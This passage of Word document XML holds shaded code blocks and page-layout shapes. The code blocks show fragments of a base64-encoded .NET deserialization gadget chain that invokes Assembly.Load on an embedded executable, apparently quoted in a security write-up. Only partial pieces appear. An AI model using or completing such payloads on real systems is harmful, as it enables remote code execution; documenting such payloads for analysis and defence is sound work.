          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gcAAAAH"</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35</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"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QoEAwAA"</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36</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"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0Y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XJnZXQw"</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37</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"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2F0ZUVu"</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38</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"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gkLAAAA"</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39</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"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mF0aW9u"</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40</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"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WJlclR5"</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41</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"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QAAAAYR"</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42</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"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AoBCwAA"</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43</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"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3RlbS5Y"</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44</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"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>j1iNzdh"</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45</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"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>24uQXNz"</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46</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"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABIAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,630" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1660,10484,1661,10484,1662,10484,1664,10484,1665,10484,1667,10484,1669,10484,1671,10484,1673,10484,1675,10484,1677,10484,1679,10484,1681,10484,1684,10484,1686,10484,1689,10484,1692,10484,1694,10484,1697,10484,1701,10484,1704,10484,1707,10484,1711,10484,1714,10484,1718,10484,1722,10484,1726,10484,1730,10484,1734,10484,1738,10484,1743,10484,1748,10484,1752,10484,1757,10484,1762,10484,1768,10484,1773,10484,1779,10484,1784,10484,1790,10484,1796,10484,1803,10484,1809,10484,1816,10484,1822,10484,1829,10484,1836,10484,1844,10484,1851,10484,1859,10484,1867,10484,1875,10484,1883,10484,1891,10484,1900,10484,1909,10484,1918,10484,1927,10484,1936,10484,1946,10484,1955,10484,1966,10484,1976,10484,1986,10484,1997,10484,2008,10484,2019,10484,2030,10484,2042,10484,2054,10484,2066,10484,2078,10484,2090,10484,2103,10484,2116,10484,2129,10484,2143,10484,2156,10484,2170,10484,2185,10484,2199,10484,2214,10484,2229,10484,2244,10484,2259,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10483,2275,10482,2275,10482,2275,10480,2275,10479,2275,10477,2275,10475,2275,10473,2275,10470,2275,10466,2275,10462,2275,10458,2275,10453,2275,10448,2275,10442,2275,10435,2275,10428,2275,10419,2275,10411,2275,10401,2275,10391,2275,10379,2275,10367,2275,10354,2275,10340,2275,10326,2275,10310,2275,10293,2275,10275,2275,10256,2275,10236,2275,10215,2275,10192,2275,10168,2275,10143,2275,10117,2275,10090,2275,10061,2275,10031,2275,9999,2275,9966,2275,9931,2275,9895,2275,9858,2275,9819,2275,9778,2275,9735,2275,9691,2275,9646,2275,9598,2275,9549,2275,9498,2275,9445,2275,9391,2275,9334,2275,9275,2275,9215,2275,9153,2275,9088,2275,9022,2275,8953,2275,8883,2275,8810,2275,8735,2275,8658,2275,8578,2275,8497,2275,8413,2275,8326,2275,8238,2275,8146,2275,8053,2275,7957,2275,7859,2275,7758,2275,7654,2275,7548,2275,7439,2275,7328,2275,7214,2275,7097,2275,6977,2275,6855,2275,6730,2275,6602,2275,6471,2275,6337,2275,6201,2275,6061,2275,5918,2275,5773,2275,5624,2275,5472,2275,5317,2275,5159,2275,4997,2275,4833,2275,4665,2275,4494,2275,4319,2275,4141,2275,3960,2275,3776,2275,3587,2275,3396,2275,3201,2275,3002,2275,2800,2275,2594,2275,2385,2275,2172,2275,1955,2275,1734,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2274,1510,2274,1510,2274,1510,2274,1510,2274,1510,2273,1510,2273,1510,2273,1510,2272,1510,2272,1510,2271,1510,2271,1510,2270,1510,2269,1510,2269,1510,2268,1510,2267,1510,2266,1510,2265,1510,2264,1510,2263,1510,2262,1510,2260,1510,2259,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2249,1510,2247,1510,2245,1510,2243,1510,2241,1510,2239,1510,2236,1510,2234,1510,2231,1510,2228,1510,2226,1510,2223,1510,2219,1510,2216,1510,2213,1510,2209,1510,2206,1510,2202,1510,2198,1510,2194,1510,2190,1510,2186,1510,2182,1510,2177,1510,2172,1510,2168,1510,2163,1510,2158,1510,2152,1510,2147,1510,2141,1510,2136,1510,2130,1510,2124,1510,2117,1510,2111,1510,2104,1510,2098,1510,2091,1510,2084,1510,2076,1510,2069,1510,2061,1510,2053,1510,2045,1510,2037,1510,2029,1510,2020,1510,2011,1510,2002,1510,1993,1510,1984,1510,1974,1510,1964,1510,1954,1510,1944,1510,1934,1510,1923,1510,1912,1510,1901,1510,1890,1510,1878,1510,1866,1510,1854,1510,1842,1510,1830,1510,1817,1510,1804,1510,1791,1510,1777,1510,1764,1510,1750,1510,1735,1510,1721,1510,1706,1510,1691,1510,1676,1510,1661,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:650" coordorigin="1490,1630" coordsize="30,650" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1660,1517,1661,1517,1662,1517,1664,1517,1665,1517,1667,1517,1669,1517,1671,1517,1673,1517,1675,1517,1677,1517,1679,1517,1681,1517,1684,1517,1686,1517,1689,1517,1692,1517,1694,1517,1697,1517,1701,1517,1704,1517,1707,1517,1711,1517,1714,1517,1718,1517,1722,1517,1726,1517,1730,1517,1734,1517,1738,1517,1743,1517,1748,1517,1752,1517,1757,1517,1762,1517,1768,1517,1773,1517,1779,1517,1784,1517,1790,1517,1796,1517,1803,1517,1809,1517,1816,1517,1822,1517,1829,1517,1836,1517,1844,1517,1851,1517,1859,1517,1867,1517,1875,1517,1883,1517,1891,1517,1900,1517,1909,1517,1918,1517,1927,1517,1936,1517,1946,1517,1955,1517,1966,1517,1976,1517,1986,1517,1997,1517,2008,1517,2019,1517,2030,1517,2042,1517,2054,1517,2066,1517,2078,1517,2090,1517,2103,1517,2116,1517,2129,1517,2143,1517,2156,1517,2170,1517,2185,1517,2199,1517,2214,1517,2229,1517,2244,1517,2259,1517,2275e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:112.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:670" coordorigin="1490,2250" coordsize="8990,670" path="m1510,2275l1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1511,2275,1512,2275,1512,2275,1514,2275,1515,2275,1517,2275,1519,2275,1521,2275,1524,2275,1528,2275,1532,2275,1536,2275,1541,2275,1546,2275,1552,2275,1559,2275,1566,2275,1575,2275,1583,2275,1593,2275,1603,2275,1615,2275,1627,2275,1640,2275,1654,2275,1668,2275,1684,2275,1701,2275,1719,2275,1738,2275,1758,2275,1780,2275,1802,2275,1826,2275,1851,2275,1877,2275,1904,2275,1933,2275,1963,2275,1995,2275,2028,2275,2063,2275,2099,2275,2136,2275,2175,2275,2216,2275,2259,2275,2303,2275,2348,2275,2396,2275,2445,2275,2496,2275,2549,2275,2604,2275,2660,2275,2719,2275,2779,2275,2841,2275,2906,2275,2972,2275,3041,2275,3112,2275,3184,2275,3259,2275,3336,2275,3416,2275,3498,2275,3582,2275,3668,2275,3757,2275,3848,2275,3941,2275,4037,2275,4136,2275,4236,2275,4340,2275,4446,2275,4555,2275,4666,2275,4780,2275,4897,2275,5017,2275,5139,2275,5264,2275,5392,2275,5523,2275,5657,2275,5793,2275,5933,2275,6076,2275,6222,2275,6370,2275,6522,2275,6677,2275,6835,2275,6997,2275,7161,2275,7329,2275,7500,2275,7675,2275,7853,2275,8034,2275,8219,2275,8407,2275,8598,2275,8793,2275,8992,2275,9194,2275,9400,2275,9609,2275,9823,2275,10039,2275,10260,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,